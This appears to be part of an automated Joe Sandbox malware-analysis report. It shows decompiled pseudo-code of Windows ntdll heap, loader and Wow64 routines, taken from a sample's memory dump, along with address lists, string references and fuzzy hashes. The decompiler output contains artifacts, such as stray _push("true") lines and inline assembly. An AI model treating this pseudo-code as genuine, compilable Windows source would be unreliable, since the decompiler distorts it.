							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E36B9DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E36ADFABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E36ADFABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E36ADFA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E36AF3C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E36AF3C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push("true");
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E36B22F90();
								}
							}
							_t107 = E36AF3C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E36AF3C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push("true");
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E36B22F90();
							}
							if(E36AF3C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E36B9D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}

0x36adf8b0
0x36adf8b8
0x36adf8c2
0x36adf8c6
0x36adf8c9
0x36adf8ce
0x36b3e467
0x36b3e46e
0x36b3e474
0x36b3e47a
0x36b3e47e
0x36b3e49d
0x36b3e4a2
0x36b3e480
0x36b3e495
0x36b3e49a
0x36b3e4a8
0x36b3e4ad
0x36b3e4b2
0x36b3e4ba
0x36b3e4c2
0x36b3e4c3
0x36b3e4c3
0x36b3e4ba
0x36adf9f6
0x36adf9f6
0x36adf9f8
0x36adf9fc
0x36adf9fd
0x36adf9fe
0x36adfa09
0x36adfa09
0x36adf8db
0x36b3e4cd
0x36b3e4d3
0x36b3e4d6
0x36adfa37
0x36adfa37
0x00000000
0x36adfa37
0x36b3e4dc
0x36b3e4e1
0x36b3e4e3
0x36b3e4e9
0x36b3e4eb
0x36b3e4eb
0x36b3e4f2
0x36b3e4f9
0x36b3e504
0x36b3e505
0x36b3e50c
0x00000000
0x36b3e50c
0x36adf8e8
0x36b3e516
0x36b3e51f
0x36b3e525
0x00000000
0x36b3e525
0x36adf8ee
0x36adf8ee
0x36adf8f5
0x36b3e530
0x36b3e532
0x36b3e532
0x36adf8fd
0x36adf909
0x36b3e53c
0x36b3e543
0x00000000
0x00000000
0x36b3e54b
0x36b3e550
0x36b3e552
0x00000000
0x00000000
0x00000000
0x36adf90f
0x36adf90f
0x36adf918
0x00000000
0x36adf91e
0x36adf924
0x36adf92b
0x36adf930
0x36adf931
0x36adf936
0x36adf93c
0x36adf93e
0x36b3e55d
0x36b3e55f
0x36b3e563
0x36b3e56a
0x36b3e578
0x36b3e57c
0x36b3e581
0x36b3e586
0x36b3e588
0x36b3e59a
0x36b3e58a
0x36b3e593
0x36b3e593
0x36b3e59f
0x36b3e5a2
0x36b3e5a8
0x36b3e5ae
0x36b3e5ae
0x36b3e5b3
0x36b3e5b3
0x36adf94d
0x36adfa0c
0x36adf953
0x36adf953
0x36adf953
0x36adf957
0x36adfa17
0x36adfa1b
0x36adfa28
0x36adfa2d
0x36adfa2d
0x36adf95d
0x36adf965
0x36b3e5c7
0x36b3e5cc
0x36b3e5ce
0x36b3e5d3
0x36b3e5d3
0x36adf96f
0x36adf981
0x36adf981
0x00000000
0x36adf987
0x36adf98d
0x36adf992
0x36adf999
0x00000000
0x36adf99b
0x36adf99b
0x36adf9a0
0x36adf9ac
0x36b3e5e3
0x36adf9b2
0x36adf9b2
0x36adf9b2
0x36adf9b7
0x36b3e5ea
0x36b3e5f0
0x36b3e5f7
0x36b3e5fd
0x36b3e602
0x36b3e604
0x36b3e60f
0x36b3e60f
0x36b3e60f
0x36b3e618
0x36b3e621
0x36b3e622
0x36b3e624
0x36b3e62c
0x36b3e62d
0x36b3e631
0x36b3e631
0x36b3e5f7
0x36adf9bd
0x36adf9c2
0x36adf9ce
0x36b3e644
0x36adf9d4
0x36adf9d4
0x36adf9d4
0x36adf9d9
0x36b3e64b
0x36b3e650
0x36b3e652
0x36b3e65d
0x36b3e65d
0x36b3e65d
0x36b3e666
0x36b3e66f
0x36b3e670
0x36b3e672
0x36b3e67a
0x36b3e67b
0x36b3e67f
0x36b3e67f
0x36adf9e6
0x36b3e692
0x36adf9ec
0x36adf9ec
0x36adf9ec
0x36adf9f4
0x36adfa3d
0x36adfa3d
0x00000000
0x36adf9f4
0x36adf999
0x36adf918

APIs

RtlDebugPrintTimes.NTDLL ref: 36B3E51F

Strings

HEAP[%wZ]: , xrefs: 36B3E490
HEAP: , xrefs: 36B3E49D
(HeapHandle != NULL), xrefs: 36B3E4A8

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: d588ab37a67bba71f8d26fa000306c5cc7546683235408b783fa9be5102fe129
Instruction ID: 4f5a53ffd06ee4c698407b39568aff0d9117c1e07f5142619eb0a28cfe08fa21
Opcode Fuzzy Hash: d588ab37a67bba71f8d26fa000306c5cc7546683235408b783fa9be5102fe129
Instruction Fuzzy Hash: 4F91FE71B05760AFE315CF24CDB4B6BB7A9FF84A44F21045AED449B281DB34E842CB92

Uniqueness

Uniqueness Score: -1.00%

Function 36B00AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E36B00AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x36bd68d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x36bd65f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E36B17550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E36AEFED0(0x36bd32d8);
					if( *0x36bd65f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x36bd9218; // 0x0
						_push("true");
						_pop(_t111);
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x36bd32d8);
						E36AEE740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E36AD6DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E36AE98DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x36bd65f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x36bd91e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_push("true");
								_pop(_t130);
								_v8 = _t76;
								if(E36B01C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x36bd68d8;
									if( *0x36bd68d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x36bd5d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E36AF5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x36bd68d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E36B288C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x36bd68d8 = _v24;
											 *0x36bd5d4c = _v28;
											goto L9;
										}
										_t89 =  *0x36bd5d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E36B288C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E36B288C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x36bd68d8);
										goto L39;
									} else {
										_t101 =  *0x36bd37c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E36B5E692();
											_t101 =  *0x36bd37c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E36B00C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E36AFDF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}

0x36b00af6
0x36b00af8
0x36b00afa
0x36b00afd
0x36b00b00
0x36b00b06
0x36b49ea5
0x36b49ea5
0x36b00b13
0x36b00bd3
0x36b00be3
0x36b00be3
0x36b00be5
0x00000000
0x00000000
0x36b00bd8
0x36b00bdb
0x36b00be0
0x36b00be0
0x00000000
0x36b00b19
0x36b00b19
0x36b00b27
0x36b00b2a
0x36b00b36
0x36b00c0d
0x36b00c15
0x36b00c1e
0x36b00c20
0x36b00c21
0x36b00c23
0x36b00c25
0x36b00c25
0x36b00b3e
0x36b00b40
0x36b00b43
0x36b00b46
0x36b00b4b
0x36b00bc2
0x36b00bc2
0x36b00bc7
0x36b00bd2
0x36b00b4d
0x36b00b50
0x36b00b56
0x36b00b59
0x36b00b59
0x36b00b5e
0x36b49eb1
0x36b49eb3
0x36b49eb8
0x36b49ebb
0x36b49ebd
0x00000000
0x00000000
0x36b49ec3
0x36b00b66
0x36b00b69
0x36b00b70
0x36b00bec
0x36b00bf3
0x36b00bfa
0x36b00bfc
0x36b00c02
0x36b00c04
0x36b00c04
0x36b00bf3
0x36b00b72
0x36b00b76
0x36b00b78
0x36b00b7b
0x36b00b7d
0x36b00b7f
0x36b00b80
0x36b00b8a
0x36b49ec8
0x36b49ecb
0x36b49ecb
0x36b49ece
0x36b49ece
0x36b49ed1
0x36b49ed4
0x36b49ed4
0x36b49edc
0x36b49ede
0x36b49ee5
0x36b49ef1
0x36b49ef1
0x36b49ee7
0x36b49ee7
0x36b49eed
0x36b49eed
0x36b49ef4
0x36b49f0a
0x36b49f0c
0x36b49f0f
0x36b49f11
0x36b49f4e
0x36b49f54
0x36b49f56
0x36b49fbb
0x36b49fbe
0x36b49fc1
0x36b49fc4
0x36b49fc4
0x36b49fc7
0x36b49fca
0x36b49fca
0x36b49fd0
0x36b49fd0
0x36b49fd3
0x36b49fdd
0x36b49fe2
0x36b49fe5
0x36b49fe8
0x36b49ff0
0x00000000
0x36b49ff0
0x36b49f58
0x36b49f5d
0x36b49f5d
0x36b49f62
0x36b49f65
0x36b49f6a
0x36b49f6d
0x36b49f70
0x36b49f72
0x36b49f75
0x36b49f78
0x36b49f78
0x36b49f7b
0x36b49f7e
0x36b49f7e
0x36b49f93
0x36b49f9a
0x36b49f9f
0x36b49fb4
0x00000000
0x36b49f13
0x36b49f13
0x36b49f18
0x36b49f1a
0x36b49f1c
0x36b49f21
0x36b49f23
0x36b49f24
0x36b49f29
0x36b49f2e
0x36b49f33
0x36b49f38
0x36b49f3d
0x36b49f3d
0x36b49f40
0x36b49f42
0x36b49f48
0x36b49f48
0x00000000
0x36b49f42
0x36b49f11
0x36b00b8a
0x36b00b90
0x36b00b96
0x36b00ba1
0x36b00baa
0x36b00bb2
0x36b00bb5
0x36b00bb8
0x36b00bbb
0x36b00bbf
0x00000000
0x36b00bbf
0x36b00b4b

APIs

RtlDebugPrintTimes.NTDLL ref: 36B00BFC

Strings

LdrpCheckModule, xrefs: 36B49F24
Failed to allocated memory for shimmed module list, xrefs: 36B49F1C
minkernel\ntdll\ldrinit.c, xrefs: 36B49F2E

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 894f2972a442a3346fc8d7b0da16e1a2f01e880fc1cc7a46c98f3233ea75aec1
Instruction ID: 2f3b1077676b0e0147c6ad089497e6322c2aa306a2a9ff8cb4a0fbb61887dfd9
Opcode Fuzzy Hash: 894f2972a442a3346fc8d7b0da16e1a2f01e880fc1cc7a46c98f3233ea75aec1
Instruction Fuzzy Hash: 9071E175E102159FEB05EF68C990AAEBBF5FB44308F144069E905EB251E734AD42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36B65B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E36B65B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E36AFDDA0(0, 0, 0x36ab1b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(E36AFCF00(_t36, _t38, _v8, 0x36ab1b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(E36AFCF00(_t36, _t38, _v8, 0x36ab1b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(E36AFCF00(_t36, _t38, _v8, 0x36ab1b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x36bd91e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x36bd91e0(_t40, "true", 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x36bd91e0(_t40);
								_v20();
							}
						}
					}
				}
				return E36AFCD80(_t36, _t43);
			}

0x36b65b90
0x36b65ba6
0x36b65bad
0x36b65c51
0x36b65c51
0x36b65bb7
0x36b65bcd
0x36b65bd2
0x36b65be8
0x36b65bed
0x36b65c03
0x36b65c05
0x36b65c0f
0x36b65c18
0x36b65c1c
0x36b65c31
0x36b65c37
0x36b65c3a
0x36b65c3e
0x36b65c44
0x36b65c44
0x36b65c47
0x36b65c03
0x36b65be8
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B65C0F
RtlDebugPrintTimes.NTDLL ref: 36B65C31
RtlDebugPrintTimes.NTDLL ref: 36B65C3E

Strings

Wow64 Emulation Layer, xrefs: 36B65C09

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 68450a560aa3f9503adfd21c35f10cc497b315c1cba57950791eb82eec73a1ac
Instruction ID: ba556baf58884f42b5c6bafb0c999281742edc672f99b069803a1bc320083f20
Opcode Fuzzy Hash: 68450a560aa3f9503adfd21c35f10cc497b315c1cba57950791eb82eec73a1ac
Instruction Fuzzy Hash: 2721F97690011EBFAF01AAA28D84DFFBF7DEF45699B440054FE02A6101E635EE11DF61

Uniqueness

Uniqueness Score: -1.00%

Function 36B0EE48 Relevance: 6.3, APIs: 4, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E36B0EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push("true");
				_push(0x36bbc610);
				E36B37C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L36AF2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E36AF24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x36bd67f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x36bd67f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x36bd67f0; // 0x0
							_t309 =  *0x36bd67f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x68c05b0
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E36B0F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x36bd91e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x68c1b14
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E36AF24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L36AF2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L36AF2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E36AF24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L36AF2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x68c1b14
										E36B6C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
